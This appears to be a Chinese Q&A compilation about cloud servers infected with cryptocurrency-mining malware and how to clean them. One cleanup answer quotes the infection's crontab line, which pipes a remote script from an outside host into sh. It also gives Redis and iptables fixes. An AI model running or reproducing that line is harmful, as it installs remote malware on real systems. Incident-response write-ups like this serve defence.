導航:首頁 > 配伺服器 > 雲伺服器被拿來挖坑

雲伺服器被拿來挖坑

發布時間:2022-01-19 05:56:27

❶ 新人想用伺服器挖礦,是否可行

完全可以。

❷ 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦?去舉報啊。之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。你看你的被下了啥,就去找他們處理。

❸ 如何評價騰訊雲在防止伺服器可能被植入挖礦木馬,成為

用護衛神,就可以防止網站和伺服器被入侵。

❹ 如何通過雲計算伺服器實現比特幣挖礦

  1. 各公有雲廠商都明確要求不允許使用雲伺服器進行挖礦,否則會被封禁的;

  2. 挖礦主要使用的是GPU,目前各公有雲廠商提供的GPU伺服器都比較貴的,從性價比上來說不劃算,還不如用專用晶元;

當然,有黑客通過漏洞入侵伺服器,在上面植入挖礦程序和腳本,進行挖礦操作,但這個本身是不合法的行為。

❺ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

❻ 能否用雲伺服器進行cpu挖礦

當然可以啦!
不過要選擇可以Cpu挖礦的幣。
1.cpu挖礦的本身比較少了,比較有名的有:xmr,hsr等
2.租用伺服器的成本要考慮進去了。
挖礦基本沒法他用了

❼ 挖礦是雲伺服器好還是物理伺服器好

挖礦需要耗費大量伺服器資源,對伺服器配置要求比較高。物理伺服器相對好些。雲伺服器相當於物理伺服器劃分出來的子伺服器。

❽ 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的,因為沒有解決好漏洞。
建議是重做系統,然後找護衛神給你做一下系統安全加固,把漏洞徹底堵住才有效果。

❾ 用GPU雲伺服器可以挖礦么比如最近很火的以太坊

可以是可以的,但是成本估計你接受不了。

❿ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

閱讀全文

與雲伺服器被拿來挖坑相關的資料

熱點內容
怎麼查看公司郵箱伺服器地址 瀏覽:571
php可忽略大小寫的模式符 瀏覽:946
白熊app稿費怎麼樣 瀏覽:463
新建的命令為 瀏覽:425
數組兩種查找演算法集合 瀏覽:757
dw怎麼將源碼拆成幾個文件 瀏覽:230
驗演算法復核法 瀏覽:996
電腦管機就刪除文件夾 瀏覽:480
建築的書pdf 瀏覽:355
歷史考研11本pdf 瀏覽:381
pdf膜官網 瀏覽:606
游戲資源文件存在哪個文件夾 瀏覽:10
mc怎麼用命令方塊無限生成僵屍 瀏覽:796
英文蝦皮app怎麼登錄 瀏覽:436
同花順app怎麼確定盤中個股買入點 瀏覽:871
程序員摸底考試考什麼 瀏覽:529
如果編譯器是中文 瀏覽:519
程序員升職怎麼談 瀏覽:112
android機頂盒ui 瀏覽:364
tb編譯器 瀏覽:740